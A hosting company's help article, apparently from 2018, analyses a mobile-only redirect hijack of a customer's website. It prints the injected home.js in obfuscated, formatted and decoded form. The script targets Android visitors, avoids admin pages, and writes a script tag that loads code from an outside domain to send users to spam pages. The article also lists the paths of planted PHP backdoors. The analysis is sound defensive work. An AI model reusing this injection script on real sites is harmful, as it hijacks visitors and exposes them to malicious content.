861、371、中国信息港、第一万维网、59互联,第一主机,一站式综合登陆平台
备案流程
付款方式
登录
注册
4006371371
Toggle navigation
0
首页
域名注册
域名购买
域名注册
批量注册
域名管理
独立管理平台
域名安全锁
New
域名信息
域名价格
Whois查询
域名优惠
服务器租用
多线机房
郑州多线
电信机房
河南电信
广东电信
江苏电信
联通机房
河南联通(中原数据基地)
国际贸易机房
国际贸易机房A
国际贸易机房B
高防大带宽
厦门大带宽
浙江宁波大带宽
广东佛山大带宽
优惠信息
服务器托管
多线机房
郑州多线
浙江双线
电信机房
江苏电信
江西电信
浙江电信
联通机房
河南联通(中原数据基地)
虚拟主机
云主机
国际贸易专用主机
成品网站
优惠信息
VPS主机
优惠信息
易方VPS
云主机
易方云主机
云主机基础型
云主机豪华型
了解云主机
云主机相关
优惠信息
智能建站
优惠活动
企业建站
PC站
手机站
PC+手机站
建站服务
模板展示
功能配置
建站案例
建站帮助
帮助中心
解决方案
企业邮箱
标准版
企业版
SSL证书
在线购买
优惠活动
新闻中心
新闻中心
|- 新闻公告
帮助中心
|- 域名帮助
|- 虚拟主机帮助
|- VPS帮助
|- 云主机帮助
|- 服务器租用帮助
|- 服务器托管帮助
|- SSL帮助
|- 企业邮局
|- CDN帮助
|- 用户帮助
|- 智能建站帮助
最近流行的手机站区域性劫持的分析及处理!
分类
服务器租用帮助
阅读3731 次
发布日期 2018-11-01
本次接到的客户遇到的问题是他的手机站总是跳转到一个垃圾推广网站页面上,电脑端的正常,查了好久也没发现在哪儿,就请我来帮忙一起分析并处理一下.
首先我们先用谷歌浏览器模拟手机访问,同时利用抓包工具分析一下他的详细访问及源码,如下:
然后去服务器上查看一下他站点目录内的js有没有最近修改过的痕迹,然后就发现了home.js最近被改动过,如下:
现在我们来解密一下这个home.js文件,还原下看看他的详细操作,如下:
【原加密代码】
var __encode ='sojson.com', _0xb483=["\x5F\x64\x65\x63\x6F\x64\x65","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x73\x6F\x6A\x73\x6F\x6E\x2E\x63\x6F\x6D\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x6F\x62\x66\x75\x73\x63\x61\x74\x6F\x72\x2E\x68\x74\x6D\x6C"];(function(_0xd642x1){_0xd642x1[_0xb483[0]]= _0xb483[1]})(window);var _0x709e=["\x67\x65\x74\x48\x6F\x75\x72\x73","\x67\x65\x74\x4D\x69\x6E\x75\x74\x65\x73","\x3A","\x73\x70\x6C\x69\x74","\x72\x61\x6E\x64\x6F\x6D","\x6C\x65\x6E\x67\x74\x68","\x67\x65\x74\x54\x69\x6D\x65","\x73\x65\x74\x54\x69\x6D\x65","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x47\x4D\x54\x53\x74\x72\x69\x6E\x67","\x73\x75\x62\x73\x74\x72\x69\x6E\x67","\x73","\x68","\x64","\x28\x5E\x7C\x20\x29","\x3D\x28\x5B\x5E\x3B\x5D\x2A\x29\x28\x3B\x7C\x24\x29","\x6D\x61\x74\x63\x68","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x61\x70\x70\x56\x65\x72\x73\x69\x6F\x6E","\x61\x6E\x64\x72\x6F\x69\x64","\x69\x6E\x64\x65\x78\x4F\x66","\x74\x6F\x4C\x6F\x77\x65\x72\x43\x61\x73\x65","\x69\x50\x68\x6F\x6E\x65","\x69\x50\x61\x64","\x68\x72\x65\x66","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x68\x61\x6E\x7A\x68\x61\x6E\x77\x61\x70","\x68\x36","\x30\x3A\x30\x30","\x38\x3A\x33\x30","\x31\x35\x3A\x30\x30","\x32\x33\x3A\x35\x39","\x61\x6A\x61\x78","\x3C\x73\x63\x72\x69\x70\x74","\x20\x6C\x61\x6E\x67\x75\x61\x67\x65\x3D\x22\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x73\x72\x63\x3D\x22\x2F\x2F\x77\x77\x77\x2E\x62\x6E\x67\x72\x68\x6B\x2E\x63\x6F\x6D\x2F","\x31\x2E\x6A\x73\x22\x3E\x3C","\x2F\x73\x63\x72\x69\x70","\x74\x3E","\x77\x72\x69\x74\x65","\x31","\x31\x3A\x33\x30","\x36\x3A\x35\x39","\x64\x32\x34"];function checkTime(_0xf217x2){var _0xf217x3= new Date();var _0xf217x4=parseInt(_0xf217x3[_0x709e[0]]())* 60+ parseInt(_0xf217x3[_0x709e[1]]());var _0xf217x5=_0xf217x2[0][_0x709e[3]](_0x709e[2]);var _0xf217x6=_0xf217x2[1][_0x709e[3]](_0x709e[2]);var _0xf217x7=parseInt(_0xf217x5[0])* 60+ parseInt(_0xf217x5[1]);var _0xf217x8=parseInt(_0xf217x6[0])* 60+ parseInt(_0xf217x6[1]);if(_0xf217x4>= _0xf217x7&& _0xf217x4<= _0xf217x8){return true}else {return false}}function randomNum(_0xf217xa,_0xf217xb){switch(arguments[_0x709e[5]]){case 1:return parseInt(Math[_0x709e[4]]()* _0xf217xa+ 1,10);break;case 2:return parseInt(Math[_0x709e[4]]()* (_0xf217xb- _0xf217xa+ 1)+ _0xf217xa,10);break;default:return 0;break}}function setCookie(_0xf217xd,_0xf217xe,_0xf217xf){var _0xf217x10=getsec(_0xf217xf);var _0xf217x11= new Date();_0xf217x11[_0x709e[7]](_0xf217x11[_0x709e[6]]()+ _0xf217x10* 1);document[_0x709e[8]]= _0xf217xd+ _0x709e[9]+ escape(_0xf217xe)+ _0x709e[10]+ _0xf217x11[_0x709e[11]]()}function getsec(_0xf217x13){var _0xf217x14=_0xf217x13[_0x709e[12]](1,_0xf217x13[_0x709e[5]])* 1;var _0xf217x15=_0xf217x13[_0x709e[12]](0,1);if(_0xf217x15== _0x709e[13]){return _0xf217x14* 1000}else {if(_0xf217x15== _0x709e[14]){return _0xf217x14* 60* 60* 1000}else {if(_0xf217x15== _0x709e[15]){return _0xf217x14* 24* 60* 60* 1000}}}}function getCookie(_0xf217xd){var _0xf217x17,_0xf217x18= new RegExp(_0x709e[16]+ _0xf217xd+ _0x709e[17]);if(_0xf217x17= document[_0x709e[8]][_0x709e[18]](_0xf217x18)){return unescape(_0xf217x17[2])}else {return null}}var browser={versions:function(){var _0xf217x1a=navigator[_0x709e[19]],_0xf217x1b=navigator[_0x709e[20]];return {android:_0xf217x1a[_0x709e[23]]()[_0x709e[22]](_0x709e[21])> -1,iPhone:_0xf217x1a[_0x709e[22]](_0x709e[24])> -1,iPad:_0xf217x1a[_0x709e[22]](_0x709e[25])> -1}}()};var xxx=randomNum(1,2);var isadmin=(window[_0x709e[27]][_0x709e[26]])[_0x709e[18]](/admin/i)!= null;if(!isadmin){var isiPad=navigator[_0x709e[19]][_0x709e[18]](/Adr|Linux|Android/i)!= null;if(isiPad){if(getCookie(_0x709e[28])){var hanzhanwap=parseInt(getCookie(_0x709e[28]))+ 1;setCookie(_0x709e[28],hanzhanwap,_0x709e[29]);if(parseInt(getCookie(_0x709e[28]))<= 6){if(checkTime([_0x709e[30],_0x709e[31]])|| checkTime([_0x709e[32],_0x709e[33]])){if(xxx== 1){$[_0x709e[34]]= 1;document[_0x709e[40]](_0x709e[35]+ _0x709e[36]+ _0x709e[37]+ _0x709e[38]+ _0x709e[39])}}}}else {setCookie(_0x709e[28],_0x709e[41],_0x709e[29]);if(checkTime([_0x709e[42],_0x709e[43]])){if(xxx== 1){document[_0x709e[40]](_0x709e[35]+ _0x709e[36]+ _0x709e[37]+ _0x709e[38]+ _0x709e[39])}}}}}else {setCookie(_0x709e[28],888,_0x709e[44])}
复制代码
【格式化后】
var __encode = 'sojson.com',
_0xb483 = ["\x5F\x64\x65\x63\x6F\x64\x65", "\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x73\x6F\x6A\x73\x6F\x6E\x2E\x63\x6F\x6D\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x6F\x62\x66\x75\x73\x63\x61\x74\x6F\x72\x2E\x68\x74\x6D\x6C"];
(function(_0xd642x1) {
_0xd642x1[_0xb483[0]] = _0xb483[1]
})(window);
var _0x709e = ["\x67\x65\x74\x48\x6F\x75\x72\x73", "\x67\x65\x74\x4D\x69\x6E\x75\x74\x65\x73", "\x3A", "\x73\x70\x6C\x69\x74", "\x72\x61\x6E\x64\x6F\x6D", "\x6C\x65\x6E\x67\x74\x68", "\x67\x65\x74\x54\x69\x6D\x65", "\x73\x65\x74\x54\x69\x6D\x65", "\x63\x6F\x6F\x6B\x69\x65", "\x3D", "\x3B\x65\x78\x70\x69\x72\x65\x73\x3D", "\x74\x6F\x47\x4D\x54\x53\x74\x72\x69\x6E\x67", "\x73\x75\x62\x73\x74\x72\x69\x6E\x67", "\x73", "\x68", "\x64", "\x28\x5E\x7C\x20\x29", "\x3D\x28\x5B\x5E\x3B\x5D\x2A\x29\x28\x3B\x7C\x24\x29", "\x6D\x61\x74\x63\x68", "\x75\x73\x65\x72\x41\x67\x65\x6E\x74", "\x61\x70\x70\x56\x65\x72\x73\x69\x6F\x6E", "\x61\x6E\x64\x72\x6F\x69\x64", "\x69\x6E\x64\x65\x78\x4F\x66", "\x74\x6F\x4C\x6F\x77\x65\x72\x43\x61\x73\x65", "\x69\x50\x68\x6F\x6E\x65", "\x69\x50\x61\x64", "\x68\x72\x65\x66", "\x6C\x6F\x63\x61\x74\x69\x6F\x6E", "\x68\x61\x6E\x7A\x68\x61\x6E\x77\x61\x70", "\x68\x36", "\x30\x3A\x30\x30", "\x38\x3A\x33\x30", "\x31\x35\x3A\x30\x30", "\x32\x33\x3A\x35\x39", "\x61\x6A\x61\x78", "\x3C\x73\x63\x72\x69\x70\x74", "\x20\x6C\x61\x6E\x67\x75\x61\x67\x65\x3D\x22\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x73\x72\x63\x3D\x22\x2F\x2F\x77\x77\x77\x2E\x62\x6E\x67\x72\x68\x6B\x2E\x63\x6F\x6D\x2F", "\x31\x2E\x6A\x73\x22\x3E\x3C", "\x2F\x73\x63\x72\x69\x70", "\x74\x3E", "\x77\x72\x69\x74\x65", "\x31", "\x31\x3A\x33\x30", "\x36\x3A\x35\x39", "\x64\x32\x34"];
function checkTime(_0xf217x2) {
var _0xf217x3 = new Date();
var _0xf217x4 = parseInt(_0xf217x3[_0x709e[0]]()) * 60 + parseInt(_0xf217x3[_0x709e[1]]());
var _0xf217x5 = _0xf217x2[0][_0x709e[3]](_0x709e[2]);
var _0xf217x6 = _0xf217x2[1][_0x709e[3]](_0x709e[2]);
var _0xf217x7 = parseInt(_0xf217x5[0]) * 60 + parseInt(_0xf217x5[1]);
var _0xf217x8 = parseInt(_0xf217x6[0]) * 60 + parseInt(_0xf217x6[1]);
if (_0xf217x4 >= _0xf217x7 && _0xf217x4 <= _0xf217x8) {
return true
} else {
return false
}
}
function randomNum(_0xf217xa, _0xf217xb) {
switch (arguments[_0x709e[5]]) {
case 1:
return parseInt(Math[_0x709e[4]]() * _0xf217xa + 1, 10);
break;
case 2:
return parseInt(Math[_0x709e[4]]() * (_0xf217xb - _0xf217xa + 1) + _0xf217xa, 10);
break;
default:
return 0;
break
}
}
function setCookie(_0xf217xd, _0xf217xe, _0xf217xf) {
var _0xf217x10 = getsec(_0xf217xf);
var _0xf217x11 = new Date();
_0xf217x11[_0x709e[7]](_0xf217x11[_0x709e[6]]() + _0xf217x10 * 1);
document[_0x709e[8]] = _0xf217xd + _0x709e[9] + escape(_0xf217xe) + _0x709e[10] + _0xf217x11[_0x709e[11]]()
}
function getsec(_0xf217x13) {
var _0xf217x14 = _0xf217x13[_0x709e[12]](1, _0xf217x13[_0x709e[5]]) * 1;
var _0xf217x15 = _0xf217x13[_0x709e[12]](0, 1);
if (_0xf217x15 == _0x709e[13]) {
return _0xf217x14 * 1000
} else {
if (_0xf217x15 == _0x709e[14]) {
return _0xf217x14 * 60 * 60 * 1000
} else {
if (_0xf217x15 == _0x709e[15]) {
return _0xf217x14 * 24 * 60 * 60 * 1000
}
}
}
}
function getCookie(_0xf217xd) {
var _0xf217x17, _0xf217x18 = new RegExp(_0x709e[16] + _0xf217xd + _0x709e[17]);
if (_0xf217x17 = document[_0x709e[8]][_0x709e[18]](_0xf217x18)) {
return unescape(_0xf217x17[2])
} else {
return null
}
}
var browser = {
versions: function() {
var _0xf217x1a = navigator[_0x709e[19]],
_0xf217x1b = navigator[_0x709e[20]];
return {
android: _0xf217x1a[_0x709e[23]]()[_0x709e[22]](_0x709e[21]) > -1,
iPhone: _0xf217x1a[_0x709e[22]](_0x709e[24]) > -1,
iPad: _0xf217x1a[_0x709e[22]](_0x709e[25]) > -1
}
}()
};
var xxx = randomNum(1, 2);
var isadmin = (window[_0x709e[27]][_0x709e[26]])[_0x709e[18]](/admin/i) != null;
if (!isadmin) {
var isiPad = navigator[_0x709e[19]][_0x709e[18]](/Adr|Linux|Android/i) != null;
if (isiPad) {
if (getCookie(_0x709e[28])) {
var hanzhanwap = parseInt(getCookie(_0x709e[28])) + 1;
setCookie(_0x709e[28], hanzhanwap, _0x709e[29]);
if (parseInt(getCookie(_0x709e[28])) <= 6) {
if (checkTime([_0x709e[30], _0x709e[31]]) || checkTime([_0x709e[32], _0x709e[33]])) {
if (xxx == 1) {
$[_0x709e[34]] = 1;
document[_0x709e[40]](_0x709e[35] + _0x709e[36] + _0x709e[37] + _0x709e[38] + _0x709e[39])
}
}
}
} else {
setCookie(_0x709e[28], _0x709e[41], _0x709e[29]);
if (checkTime([_0x709e[42], _0x709e[43]])) {
if (xxx == 1) {
document[_0x709e[40]](_0x709e[35] + _0x709e[36] + _0x709e[37] + _0x709e[38] + _0x709e[39])
}
}
}
}
} else {
setCookie(_0x709e[28], 888, _0x709e[44])
}
复制代码
【解密后代码】
var __encode = 'sojson.com',
_0xb483 = ["_decode", "http://www.sojson.com/javascriptobfuscator.html"];
(function(_0xd642x1) {
_0xd642x1[_0xb483[0]] = _0xb483[1]
})(window);
var _0x709e = ["getHours", "getMinutes", ":", "split", "random", "length", "getTime", "setTime", "cookie", "=", ";expires=", "toGMTString", "substring", "s", "h", "d", "(^| )", "=([^;]*)(;|$)", "match", "userAgent", "appVersion", "android", "indexOf", "toLowerCase", "iPhone", "iPad", "href", "location", "hanzhanwap", "h6", "0:00", "8:30", "15:00", "23:59", "ajax", "<script", " language="javascript" type="text/javascript" src="//www.bngrhk.com/", "1.js"><", "/scrip", "t>", "write", "1", "1:30", "6:59", "d24"];
function checkTime(_0xf217x2) {
var _0xf217x3 = new Date();
var _0xf217x4 = parseInt(_0xf217x3[_0x709e[0]]()) * 60 + parseInt(_0xf217x3[_0x709e[1]]());
var _0xf217x5 = _0xf217x2[0][_0x709e[3]](_0x709e[2]);
var _0xf217x6 = _0xf217x2[1][_0x709e[3]](_0x709e[2]);
var _0xf217x7 = parseInt(_0xf217x5[0]) * 60 + parseInt(_0xf217x5[1]);
var _0xf217x8 = parseInt(_0xf217x6[0]) * 60 + parseInt(_0xf217x6[1]);
if (_0xf217x4 >= _0xf217x7 && _0xf217x4 <= _0xf217x8) {
return true
} else {
return false
}
}
function randomNum(_0xf217xa, _0xf217xb) {
switch (arguments[_0x709e[5]]) {
case 1:
return parseInt(Math[_0x709e[4]]() * _0xf217xa + 1, 10);
break;
case 2:
return parseInt(Math[_0x709e[4]]() * (_0xf217xb - _0xf217xa + 1) + _0xf217xa, 10);
break;
default:
return 0;
break
}
}
function setCookie(_0xf217xd, _0xf217xe, _0xf217xf) {
var _0xf217x10 = getsec(_0xf217xf);
var _0xf217x11 = new Date();
_0xf217x11[_0x709e[7]](_0xf217x11[_0x709e[6]]() + _0xf217x10 * 1);
document[_0x709e[8]] = _0xf217xd + _0x709e[9] + escape(_0xf217xe) + _0x709e[10] + _0xf217x11[_0x709e[11]]()
}
function getsec(_0xf217x13) {
var _0xf217x14 = _0xf217x13[_0x709e[12]](1, _0xf217x13[_0x709e[5]]) * 1;
var _0xf217x15 = _0xf217x13[_0x709e[12]](0, 1);
if (_0xf217x15 == _0x709e[13]) {
return _0xf217x14 * 1000
} else {
if (_0xf217x15 == _0x709e[14]) {
return _0xf217x14 * 60 * 60 * 1000
} else {
if (_0xf217x15 == _0x709e[15]) {
return _0xf217x14 * 24 * 60 * 60 * 1000
}
}
}
}
function getCookie(_0xf217xd) {
var _0xf217x17, _0xf217x18 = new RegExp(_0x709e[16] + _0xf217xd + _0x709e[17]);
if (_0xf217x17 = document[_0x709e[8]][_0x709e[18]](_0xf217x18)) {
return unescape(_0xf217x17[2])
} else {
return null
}
}
var browser = {
versions: function() {
var _0xf217x1a = navigator[_0x709e[19]],
_0xf217x1b = navigator[_0x709e[20]];
return {
android: _0xf217x1a[_0x709e[23]]()[_0x709e[22]](_0x709e[21]) > -1,
iPhone: _0xf217x1a[_0x709e[22]](_0x709e[24]) > -1,
iPad: _0xf217x1a[_0x709e[22]](_0x709e[25]) > -1
}
}()
};
var xxx = randomNum(1, 2);
var isadmin = (window[_0x709e[27]][_0x709e[26]])[_0x709e[18]](/admin/i) != null;
if (!isadmin) {
var isiPad = navigator[_0x709e[19]][_0x709e[18]](/Adr|Linux|Android/i) != null;
if (isiPad) {
if (getCookie(_0x709e[28])) {
var hanzhanwap = parseInt(getCookie(_0x709e[28])) + 1;
setCookie(_0x709e[28], hanzhanwap, _0x709e[29]);
if (parseInt(getCookie(_0x709e[28])) <= 6) {
if (checkTime([_0x709e[30], _0x709e[31]]) || checkTime([_0x709e[32], _0x709e[33]])) {
if (xxx == 1) {
$[_0x709e[34]] = 1;
document[_0x709e[40]](_0x709e[35] + _0x709e[36] + _0x709e[37] + _0x709e[38] + _0x709e[39])
}
}
}
} else {
setCookie(_0x709e[28], _0x709e[41], _0x709e[29]);
if (checkTime([_0x709e[42], _0x709e[43]])) {
if (xxx == 1) {
document[_0x709e[40]](_0x709e[35] + _0x709e[36] + _0x709e[37] + _0x709e[38] + _0x709e[39])
}
}
}
}
} else {
setCookie(_0x709e[28], 888, _0x709e[44])
}
复制代码
看来这位黑客藏的还不够深,一下就被我找到了,哈哈,于是我们就全面检查了一下网站文件和相关日志,终于看到了原因,因为网站内被放了几个后门木马,如下:
\home\wwwroot\m.*.net\Lib232\Home\Common\config.php
\home\wwwroot\www.*.net\Libbeifen\ThinkPHP\Library\Vendor\Boris\config(1).php
\home\wwwroot\www.*.net\Lib232323\ThinkPHP\Mode\Api\ray.php
好了,现在我们再一次抓到了这个小黑客并给客户做好了驱动级防御成功交差,现在可以继续进行下一位客户问题的分析和处理了!